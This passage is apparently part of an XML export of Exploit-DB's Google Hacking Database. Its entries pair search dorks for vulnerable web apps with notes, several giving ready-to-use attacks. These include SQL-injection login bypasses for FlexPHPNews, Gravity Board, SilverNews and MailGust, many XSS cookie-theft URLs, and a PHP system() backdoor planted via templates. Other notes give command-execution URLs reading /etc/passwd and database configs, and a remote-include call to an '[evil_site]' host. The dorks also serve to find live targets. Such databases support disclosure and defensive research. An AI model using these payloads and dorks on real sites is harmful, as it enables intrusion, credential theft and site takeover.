<edb></edb>
<date>2021-10-05</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>1110</id>
<link>https://www.exploit-db.com/ghdb/1110</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;e107.org 2002/2003&quot; inurl:forum_post.php?nt</shortDescription>
<textualDescription>e107 is prone to an input validation vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.Successful exploitation of this issue will permit an attacker to create arbitrary forum message posts.http://www.securityfocus.com/bid/14699</textualDescription>
<query>&quot;e107.org 2002/2003&quot; inurl:forum_post.php?nt</query>
<querystring>https://www.google.com/search?q=%22e107.org+2002/2003%22+inurl:forum_post.php%3Fnt&amp;c2coff=1&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>628</id>
<link>https://www.exploit-db.com/ghdb/628</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;File Upload Manager v1.3&quot; &quot;rename to&quot;</shortDescription>
<textualDescription>thepeak file upload manager let you manage your webtree with up and downloading files.</textualDescription>
<query>&quot;File Upload Manager v1.3&quot; &quot;rename to&quot;</query>
<querystring>https://www.google.com/search?q=%22File+Upload+Manager+v1.3%22+%22rename+to%22</querystring>
<edb></edb>
<date>2004-10-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6270</id>
<link>https://www.exploit-db.com/ghdb/6270</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;index of&quot; &quot;Production.json&quot;</shortDescription>
<textualDescription>Google Dork: &quot;index of&quot; &quot;Production.json&quot;
Dork Title: Files Containing Juicy Info
Date: [11-06-2020]
Dork Author: Swapnil Talele
</textualDescription>
<query>Dork: &quot;index of&quot; &quot;Production.json&quot;</query>
<querystring>https://www.google.com/search?q=Dork: &quot;index of&quot; &quot;Production.json&quot;</querystring>
<edb></edb>
<date>2020-06-11</date>
<author>Swapnil Talele</author>
</entry>
<entry>
<id>1099</id>
<link>https://www.exploit-db.com/ghdb/1099</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;Mail-it Now!&quot; intitle:&quot;Contact form&quot; | inurl:contact.php</shortDescription>
<textualDescription>Mail-it Now! 1.5 (possibly prior versions) contact.php remote code executionsite: http://www.skyminds.net/source/description: a mail form scriptvulnerability: unsecure file creation -&gt; remote code executionwhen you post an attachment and upload it to the server (usually to &quot;./upload/&quot; dir )the script rename the file in this way:[time() function result] + [-] + [filename that user choose]spaces are simply replaced with &quot;_&quot; chars.So a user can post an executable attachment, calculate the time() result locallythen, if attachment is a file like this:can launch commands on target system, example:http://[target]/[path]/[time() result]-[filename.php]?command=cat%20/etc/passwdu can find my poc code at this url: http://rgod.altervista.org/mailitnow.html</textualDescription>
<query>&quot;Mail-it Now!&quot; intitle:&quot;Contact form&quot; | inurl:contact.php</query>
<querystring>https://www.google.com/search?q=%22Mail-it+Now%21%22+intitle%3A%22Contact+form%22+%7C+inurl%3Acontact.php</querystring>
<edb></edb>
<date>2005-09-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>1100</id>
<link>https://www.exploit-db.com/ghdb/1100</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;maxwebportal&quot; inurl:&quot;default&quot; &quot;snitz forums&quot; +&quot;homepage&quot; -intitle:maxwebportal</shortDescription>
<textualDescription>several vulnerabilities relating to this.MaxWebPortal is a web portal and online community system which includes features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. User interface allows members to add news, content, write reviews and share information among other registered users.h**p://www.maxwebportal.com/</textualDescription>
<query>&quot;maxwebportal&quot; inurl:&quot;default&quot; &quot;snitz forums&quot; +&quot;homepage&quot; -intitle:maxwebportal</query>
<querystring>https://www.google.com/search?q=%22maxwebportal%22+inurl%3A%22default%22+%22snitz+forums%22+%2B%22homepage%22+-intitle%3Amaxwebportal</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1056</id>
<link>https://www.exploit-db.com/ghdb/1056</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;Powered by FlexPHPNews&quot; inurl:news | inurl:press</shortDescription>
<textualDescription>24/07/2005 2.38.13Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting &amp; resource consumption poc exploitsoftware:author site:http://www.china-on-site.com/flexphpnews/downloads.phpxss / cookie disclosure:http://[target]/[path]/index.php?front_indextitle=alert(document.cookie)http://[target]/[path]/index.php?front_searchsubmit=&quot;&gt;alert(document.cookie)http://[target]/[path]/index.php?front_latestnews=&quot;&gt;alert(document.cookie)http://[target]/[path]/news.php?newsid=&quot;&gt;alert(document.cookie)http://[target]/[path]/news.php?front_rating=&quot;&gt;alert(document.cookie)http://[target]/[path]/news.php?salt=&quot;&gt;alert(document.cookie)http://[target]/[path]/news.php?front_letmerateit=&quot;&gt;alert(document.cookie)http://[target]/[path]/news.php?front_ratebest=&quot;&gt;alert(document.cookie)http://[target]/[path]/news.php?front_ratesubmit=&quot;&gt;alert(document.cookie)http://[target]/[path]/news.php?front_searchsubmit=&quot;&gt;alert(document.cookie)http://[target]/[path]/search.php?front_searchresult=alert(document.cookie)http://[target]/[path]/search.php?front_searchsubmit=&quot;&gt;alert(document.cookie)http://[target]/[path]/catalog.php?front_searchsubmit=&quot;&gt;alert(document.cookie)http://[target]/[path]/catalog.php?front_latestnews=&quot;&gt;alert(document.cookie)http://[target]/[path]/catalog.php?catalogid=&quot;&gt;alert(document.cookie)path disclosure:http://[target]/[path]/admin/usercheck.php?logincheck=%00denial of service / resources consumption:http://[target]/[path]/news.php?prenumber=99999999999999999999999999999999http://[target]/[path]/news.php?nextnumber=99999999999999999999999999999999($prenumber and $nextnumber are uninitialized final values of a loop...) sql injection / bypass authentication:go to login page:http://[target]/[path]/admin/(usually admin if not changed)login as user: ' OR 'a'='aand pass : ' OR 'a'='a boom! you're admin ...the problem is in usercheck.php at line 5:$sql = &quot;select username from newsadmin where username='$checkuser' and password='$checkpass'&quot;;you can post always true statements, like 'a'='a'solution: replace $checkuser and $checkpass vars with your username and pass, by the moment</textualDescription>
<query>&quot;Powered by FlexPHPNews&quot; inurl:news | inurl:press</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22Powered+by+FlexPHPNews%22+inurl%3Anews+%7C+inurl%3Apress</querystring>
<edb></edb>
<date>2005-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>1057</id>
<link>https://www.exploit-db.com/ghdb/1057</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;Powered by FunkBoard&quot;</shortDescription>
<textualDescription>FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/password disclosure &amp; board takeover, possible remote code execution software: author site: http://www.[path_to_funkboard].co.uk/ xss: http://[target]/[path_to_funkboard]/editpost.php?fbusername=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/editpost.php?fbpassword=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbpassword=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbusername=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&amp;fbusername=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&amp;fbpassword=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&amp;subject=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&amp;threadid=1&amp;fbusername=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&amp;threadid=1&amp;fbpassword=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbusername=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbpassword=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fbusername=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fmail=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?www=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?icq=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?yim=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?location=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sex=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?interebbies=&quot;&gt;alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sig=alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?aim=&quot;&gt;alert(document.cookie) path disclosure: http://[target]/[path_to_funkboard]/images/forums.php database username &amp; password disclosure: during installation is not remembered to delete the mysql_install script and the installation do not delete it, usually: http://[target]/[path]/admin/mysql_install.php or http://[target]/[path]/admin/pg_install.php there, a user can see database clear text username &amp; password ... Then, the script let the user proceed to the next page, where he can reset funkboard administator username &amp; password. Now the script faults, because some tables exist, etc. So user can go back and setting a new database name for installation, guessing among other installations on the server... Once Installation succeeded he can set new admin username e password then login at this page: http://[target]/[path]/[path_to_funkboard]/admin/index.php Now the user can edit templates and append some evil javascript code. remote code execution: look at this code in mysql_install.php : $infoout = &quot; so, you have a backdoor on target system... you can launch commands by this urls: http://localhost:30/funkboard/info.php?command=ls%20-la to list directories... http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd to see /etc/passwd file</textualDescription>
<query>&quot;Powered by FunkBoard&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22Powered+by+FunkBoard%22&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2005-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>1051</id>
<link>https://www.exploit-db.com/ghdb/1051</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;Powered by Gravity Board&quot;</shortDescription>
<textualDescription>4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL Injection / Login Bypass, cross site scripting, path disclosure poc software: author site: http://www.gravityboardx.com/ a) Sql Injection / Login Bypass: If magic_quotes off, A user can bypass login check and grant administrator privileges on target system: login: ' or isnull(1/0) /* password: whatever b) Cross site scripting poc: b.1)After he login as administrator he can edit template to insert evil javascript code. Try to insert at the end of the template these lines: alert(document.cookie) b.2)A user can craft a malicious url like this to access target user cookies: http://[target]/[path]/deletethread.php?board_id=&quot;&gt;alert(document.cookie) c) Remote commands/php code execution: c.1) Always editing the template, attacker can leave a backdoor in target system, example, at the end of template: After, the attacker can launch commands by this urls: http://[target]/[path]/index.php?cmd=ls%20-la to list directories... http://[target]/[path]/index.php?cmd=cat%20/etc/passwd to see Unix /etc/passwd file http://[target]/[path]/index.php?cmd=cat%20config.php to see database username/password c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling editcss.php script, look at the code of this script: if($fp = fopen('gbxfinal.css','w')){ fwrite($fp, $csscontent); fclose($fp); echo ''; }else{ echo 'Gravity Board X was unable to save changes to the CSS template.'; } you can easily deface the forum and/or insert a backdoor calling an url like this: http://[target]/[path]/editcss.php?csscontent= then execute commands: http://[target]/[path]/index?cmd=[command] It's also possible to disclose path: d) path disclosure: http://[target]/[path]/deletethread.php?perm=1 http://[target]/[path]/ban.php http://[target]/[path]/addnews.php http://[target]/[path]/banned.php http://[target]/[path]/boardstats.php http://[target]/[path]/adminform.php http://[target]/[path]/forms/admininfo.php http://[target]/[path]/forms/announcements.php http://[target]/[path]/forms/banform.php ans so on...calling scripts in /forms directory</textualDescription>
<query>&quot;Powered by Gravity Board&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22Powered+by+Gravity+Board%22&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2005-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>690</id>
<link>https://www.exploit-db.com/ghdb/690</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;Powered by Land Down Under 601&quot;</shortDescription>
<textualDescription>sQL injection vulnerability in Land Down Under 601 could give an attacker administrative access. An exploit exists on the internet, search google.</textualDescription>
<query>&quot;Powered by Land Down Under 601&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22Powered+by+Land+Down+Under+601%22</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1147</id>
<link>https://www.exploit-db.com/ghdb/1147</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;powered by mailgust&quot;</shortDescription>
<textualDescription>MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takevorsoftware:site: http://www.mailgust.org/description:Mailgust is three softwares in one: * Mailing list manager * Newsletter distribution tool * Message Board Mailgust is written in php and uses a mysql database. vulnerability:if magic quotes off -&gt; SQL Injectionwithout to have an account, a user can send himself a new admin password usingpassword reminder, in email field type:[yuor_email],'or'a'='a'/*@hotmail.comgive a look to what happen:220 [MAILSERVER] SMTP Service readyHELO [MAILGUST]250 [MAILSERVER].MAIL FROM:250 MAIL FROM: OKRCPT TO:250 RCPT TO:&gt;[your_email] OKRCPT TO: OKDATA354 Start mail input; end with .Date: Sat, 24 Sep 2005 16:11:38 +0100Subject: New passwordTo: [your_email],'or'a'='a'/*@hotmail.comFrom: systemxxx@localhost.comYour login name is: [admin_email]Your new password is: 4993587Click here:http://localhost/mailgust/index.php?method=activate_new_password&amp;list=maillistuser&amp;pwd=4993587&amp;id=1756185114to activate the password, than try to log in!It is recommended that you change your password afterwards..250 Mail acceptedQUIT221 [MAILSERVER] QUITvulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363:...$query = &quot;SELECT * FROM $applName&quot;.&quot;_$userClassName &quot;. &quot;WHERE email='$this-&gt;email'&quot;;...it becomes:SELECT * FROM maillist_maillistuser WHERE email='[yuor_email],'or'a'='a'/*@hotmail.com'&quot;or'a'='a'&quot; is always true, so the query is always true, script doesn't fail, for mail function, theese are two valid email address,it will send the mail to [your_email] and to 'or'a'='a'/*@hotmail.com ;)activate the password, now you can login with [admin_email] as user and new passwordu can find my poc exploit here:http://rgod.altervista.org/maildisgust.html</textualDescription>
<query>&quot;powered by mailgust&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22powered+by+mailgust%22&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2005-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1146</id>
<link>https://www.exploit-db.com/ghdb/1146</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;powered by my little forum&quot;</shortDescription>
<textualDescription>My Little Forum 1.5 / 1.6beta SQL Injectionsoftware:site: http://www.mylittlehomepage.net/my_little_forumsoftware: &quot;A simple web-forum that supports classical thread view (message tree)as well as messagebord view to display the messages.Requires PHP &gt; 4.1 and a MySQL database.&quot;1) look at the vulnerable code at line 144 inside search.php:... $result = mysql_query(&quot;SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL &quot;. $time_difference.&quot; HOUR,'&quot;.$lang['time_format'].&quot;') AS Uhrzeit, DATE_FORMAT(time + INTERVAL &quot;.$time_difference.&quot; HOUR, '&quot;.$lang['time_format'].&quot;') AS Datum, subject, name, email, hp, place, text, category FROM &quot;.$forum_table.&quot; WHERE &quot;.$search_string.&quot; ORDER BY tid DESC, time ASC LIMIT &quot;.$ul.&quot;, &quot; .$settings['search_results_per_page'], $connid);...now goto the search page, select &quot;phrase&quot;, and type:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*if magic quotes are off you will have (guess?...) any admin/user password hash'cause $searchstring var is not filtered...u can fin my poc exploit here:http://rgod.altervista.org/mylittle15_16b.html2) 1.6beta is vulnerable even, we have:...$result = mysql_query(&quot;SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL &quot;.$time_difference.&quot; HOUR) ASUhrzeit, subject, name, email, hp, place, text, category FROM &quot;.$db_settings['forum_table'].&quot;WHERE &quot;.$search_string.&quot; ORDER BY tid DESC, time ASC LIMIT &quot;.$ul.&quot;, &quot;.$settings['search_results_per_page'],$connid);...you have same results, deleting a statement in injection string:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*</textualDescription>
<query>&quot;powered by my little forum&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22powered+by+my+little+forum%22&amp;btnG=Cerca</querystring>
<edb></edb>
<date>2005-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1052</id>
<link>https://www.exploit-db.com/ghdb/1052</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;Powered by SilverNews&quot;</shortDescription>
<textualDescription>silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting software: author site: http://www.silver-scripts.de/scripts.php?l=en&amp;script=SilverNews SQL Injection / Login bypass: A user can bypass admin password check, if magic_quotes is set to off: user: ' or isnull(1/0) /* pass: whatever remote commands execution: now, new admin can edit template, clicking on Templates -&gt; Global footer, can add the lines: //*********************************************** TEMPLATE; } } system($HTTP_GET_VARS[command]); /* to leave a backdoor in template file /templates/tpl_global.php now can launch system commands on the target system with theese urls: http://[target]/[path]//templates/tpl_global.php?command=ls%20-la to list directories http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd to see /etc/passwd file http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php to see Mysql database password cross site scripting: same way, a user can hide evil javascript code in template</textualDescription>
<query>&quot;Powered by SilverNews&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;c2coff=1&amp;q=%22Powered+by+SilverNews%22&amp;btnG=Cerca&amp;lr=</querystring>
<edb></edb>
<date>2005-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>1096</id>
<link>https://www.exploit-db.com/ghdb/1096</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;Powered by Xcomic&quot;</shortDescription>
<textualDescription>&quot;Powered by xcomic&quot;this is a recent exploit, you can retrieve any file on target systemby using &quot;../&quot; chars and null byte (%00), example:http://target/path_to_xcomic/initialize.php?xcomicRootPath=../../../../etc/passwd%00or launch commands:http://target/path_to_xcomic/initiailze.php?xcomicRootPath=http://[evil_site]/cmd.gif?command=ls%20-la%00where cmd.gif is a file like this:I have read an advisory copy here: http://forum.ccteam.ru/archive/index.php/t-57.html</textualDescription>
<query>&quot;Powered by Xcomic&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22Powered+by+Xcomic%22+&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2005-09-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>633</id>
<link>https://www.exploit-db.com/ghdb/633</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;powered by YellDL&quot;</shortDescription>
<textualDescription>Finds websites using YellDL (or also known as YellDownLoad), a download tracker written in PHP. Unfortunately this downloader downloads everything you want to, like its own files too:http://xxxxxxxxxx/download.php?f=../download&amp;e=phpBy guessing some could download information which shoudln't get out of the server (think of ../phpMyAdmin/config.php or other stuff - no need to say that lazy people use same passwords for their DB- and FTP-login.Another search to find this software is:&quot;You are downloading *&quot; &quot;you are downloader number * of this file&quot;</textualDescription>
<query>&quot;powered by YellDL&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+YellDL%22</querystring>
<edb></edb>
<date>2004-10-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>1055</id>
<link>https://www.exploit-db.com/ghdb/1055</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;Powered By: Simplicity oF Upload&quot; inurl:download.php | inurl:upload.php</shortDescription>
<textualDescription>26/07/2005 16.09.18Simplicity OF Upload 1.3 (possibly prior versons) remote code execution &amp; cross site scriptingsoftware: author site: http://www.phpsimplicity.com/scripts.php?id=3remote commands execution:problem at line 25-30: ...//check for language overriding..if (isset($_GET['language'])) $language = strtolower($_GET['language']);//now we include the language filerequire_once(&quot;$language.lng&quot;);...you can include whatever adding a null byte to &quot;language&quot; parameter value:example:http://localhost:30/simply/download.php?language=upload.php%00you will see upload &amp; download page together :)so you can upload a cmd.gif (when you upload a .php file, usually it isrenamed to .html...) file with this php code inside to executecommands:then try this url:http://[target]/[path]/download.php?language=cmd.gif%00&amp;command=lsto list directorieshttp://[target]/[path]/download.php?language=cmd.gif%00&amp;command=cat%20/etc/passwdto show /etc/passwd filecross site scripting:also, a remote user can supply a specially crafted URL to redirect other peopleto an evil page:http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00googledork:&quot;Powered By: Simplicity oF Upload&quot;</textualDescription>
<query>&quot;Powered By: Simplicity oF Upload&quot; inurl:download.php | inurl:upload.php</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22Powered+By%3A+Simplicity+oF+Upload%22+inurl%3Adownload.php+%7C+inurl%3Aupload.php&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2005-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>1098</id>
<link>https://www.exploit-db.com/ghdb/1098</link>
<category>Vulnerable Files</category>
<shortDescription>&quot;Warning:&quot; &quot;Cannot execute a blank command in&quot;</shortDescription>
<textualDescription>&quot;Warning: passthru(): Cannot execute a blank command in&quot; &quot;Warning: system(): Cannot execute a blank command in&quot; &quot;Warning: exec(): Cannot execute a blank command in&quot; generally: &quot;Warning:&quot; &quot;Cannot execute a blank command in&quot; this a php error message, essentially it shows hacked pages links where someone leaved a backdoor and the page has error_reporting not set to 0... you can execute shell commands simply appending a var, guessing variable name, usually 'cmd' or 'command' or something else, example: http://[target]/[path]/somescript.php?cmd=cat%20/etc/passwd</textualDescription>
<query>&quot;Warning:&quot; &quot;Cannot execute a blank command in&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22Warning%3A%22+%22Cannot+execute+a+blank+command+in%22</querystring>
<edb></edb>
<date>2005-09-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>7210</id>
<link>https://www.exploit-db.com/ghdb/7210</link>
<category>Vulnerable Files</category>
<shortDescription>(No Subject)</shortDescription>
<textualDescription># Google Dork: &quot;index of /&quot; intext:wp-config &quot;zip&quot;
# Vulnerable files
# Date: 11/09/2021
# Exploit Author: morningst4r</textualDescription>
<query>&quot;index of /&quot; intext:wp-config &quot;zip&quot;</query>
<querystring>https://www.google.com/search?client=firefox-b-d&amp;q=%22index+of+%2F%22+intext%3Awp-config+%22zip%22</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>morningst4r</author>
</entry>
<entry>
<id>3885</id>
<link>https://www.exploit-db.com/ghdb/3885</link>
<category>Vulnerable Files</category>
<shortDescription>-site:simplemachines.org &quot;These are the paths and URLs to your SMF installation&quot;</shortDescription>
<textualDescription>Dork:
-site:simplemachines.org &quot;These are the paths and URLs to your SMF
installation&quot;
Details:
This google dork finds sites with the Simple Machines repair_settings.php
file uploaded to the root directory. This gives unauthenticated access to
the SQL username and password for the forum.</textualDescription>
<query>-site:simplemachines.org &quot;These are the paths and URLs to your SMF installation&quot;</query>
<querystring>https://www.google.com/search?q=-site:simplemachines.org &quot;These are the paths and URLs to your SMF installation&quot;</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>7922</id>
<link>https://www.exploit-db.com/ghdb/7922</link>
<category>Vulnerable Files</category>
<shortDescription>allintext:wp-includes/rest-api</shortDescription>
<textualDescription># Google Dork: allintext:wp-includes/rest-api
# Vulnerable Files
# Date: 01/01/2022
# Exploit Author: Jayson Zabate
</textualDescription>
<query>allintext:wp-includes/rest-api</query>
<querystring>https://www.google.com/search?q=allintext:wp-includes/rest-api</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Jayson Zabate</author>
</entry>
<entry>
<id>3738</id>
<link>https://www.exploit-db.com/ghdb/3738</link>
<category>Vulnerable Files</category>
<shortDescription>allinurl:forcedownload.php?file=</shortDescription>
<textualDescription>Didn't see this anywhere in the GHDB, but its been known for a while and
widely abused by others.
Google Dork &quot;allinurl:forcedownload.php?file=&quot;
Sites that use the forcedownload.php script are vulnerable to url
manipulation, and will spit out any file on the local site, including the
PHP files themselves with all server side code, not the rendered page, but
the source itself. This is most commonly used on wordpress sites to grab the
wp-config.php file to gain access to the database, but is not limited to
wordpress sites. I only list it as an example, so people understand the
weight of flaw.
- DigiP
</textualDescription>
<query>allinurl:forcedownload.php?file=</query>
<querystring>https://www.google.com/search?q=allinurl:forcedownload.php?file=</querystring>
<edb></edb>
<date>2011-08-25</date>
<author>DigiP</author>
</entry>
<entry>
<id>6269</id>
<link>https://www.exploit-db.com/ghdb/6269</link>
<category>Vulnerable Files</category>
<shortDescription>Dork: &quot;Index of&quot; &quot;upload_image.php&quot;</shortDescription>
<textualDescription> Hello ,
Dork Title: Vulnerable Files
Google Dork: &quot;Index of&quot; &quot;upload_image.php&quot;
Date: [11-06-2020]
Dork Author: Swapnil Talele
</textualDescription>
<query>Dork: &quot;Index of&quot; &quot;upload_image.php&quot;</query>
<querystring>https://www.google.com/search?q=Dork: &quot;Index of&quot; &quot;upload_image.php&quot;</querystring>
<edb></edb>
<date>2020-06-11</date>
<author>Swapnil Talele</author>
</entry>
<entry>
<id>677</id>
<link>https://www.exploit-db.com/ghdb/677</link>
<category>Vulnerable Files</category>
<shortDescription>ext:asp &quot;powered by DUForum&quot; inurl:(messages|details|login|default|register) -site:duware.com</shortDescription>
<textualDescription>DUForum is one of those free forum software packages. The database location is determined by the config file &quot;connDUforumAdmin.asp&quot;, but the installation instructions don't recommend changing it. Ouch..Database location is: http://server/duforum/_private/DUforum.mdb</textualDescription>
<query>ext:asp &quot;powered by DUForum&quot; inurl:(messages|details|login|default|register) -site:duware.com</query>
<querystring>https://www.google.com/search?q=ext%3Aasp+%22powered+by+DUForum%22+inurl%3A%28messages%7Cdetails%7Clogin%7Cdefault%7Cregister%29+-site%3Aduware.com</querystring>
<edb></edb>
<date>2004-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>676</id>
<link>https://www.exploit-db.com/ghdb/676</link>
<category>Vulnerable Files</category>
<shortDescription>ext:asp inurl:DUgallery intitle:&quot;3.0&quot; -site:dugallery.com -site:duware.com</shortDescription>
<textualDescription>The MS access database can be downloaded from inside the docroot. The user table holds the admin password in plain text. Possible locations for the dugallery database are:http://xx/.../DUgallery/database/dugallery.mdbhttp://xx/.../DUgallery//_private/DUgallery.mdbhttp://www.securitytracker.com/alerts/2004/Nov/1012201.html</textualDescription>
<query>ext:asp inurl:DUgallery intitle:&quot;3.0&quot; -site:dugall</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=ext%3Aasp+inurl%3ADUgallery+intitle%3A%223.0%22+-site%3Adugallery.com+-site%3Aduware.com</querystring>
<edb></edb>
<date>2004-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>429</id>
<link>https://www.exploit-db.com/ghdb/429</link>
<category>Vulnerable Files</category>
<shortDescription>ext:cgi inurl:ubb6_test</shortDescription>
<textualDescription>The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk.&quot;This is the UBB6 Permissions &amp; Paths Diagnostic Script.Example:UBB Version 6.1.0.3 Perl Version 5.006 Server Type Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.10 mod_jk/1.2.0 mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2 mod_ssl/2.8.12 OpenSSL/0.9.6b check path: 1. check permission to write new files in this directory2. check for the 'required' files in both the CGI and this directory3. check my read/write permissions on all the variables files4. check my absolute paths in general settings if available version 2.1 © 2001 Infopop Corporation All Rights Reserved</textualDescription>
<query>ext:cgi inurl:ubb6_test.cgi</query>
<querystring>https://www.google.com/search?q=ext%3Acgi+inurl%3Aubb6_test.cgi</querystring>
<edb></edb>
<date>2004-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>576</id>
<link>https://www.exploit-db.com/ghdb/576</link>
<category>Vulnerable Files</category>
<shortDescription>ezBOO &quot;Administrator Panel&quot; -cvs</shortDescription>
<textualDescription>ezBOO WebStats is a high level statistical tool for web sites monitoring. It allows real time access monitoring on several sites. Based on php and mySQL it is easy to install and customization is made easy. It works on Unix, Linux and Windows</textualDescription>
<query>ezBOO &quot;Administrator Panel&quot; -cvs</query>
<querystring>https://www.google.com/search?q=ezBOO+%22%3E%3E+Administrator+Panel+%3C%3C%22+-cvs&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2004-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>645</id>
<link>https://www.exploit-db.com/ghdb/645</link>
<category>Vulnerable Files</category>
<shortDescription>filetype:cgi inurl:cachemgr.cgi</shortDescription>
<textualDescription>cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port which it then attempts to connect to. If a web server, such as apache, is running this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial of service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established.</textualDescription>
<query>filetype:cgi inurl:cachemgr.cgi</query>
<querystring>https://www.google.com/search?q=filetype%3Acgi+inurl%3Acachemgr.cgi</querystring>
<edb></edb>
<date>2004-11-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>369</id>
<link>https://www.exploit-db.com/ghdb/369</link>
<category>Vulnerable Files</category>
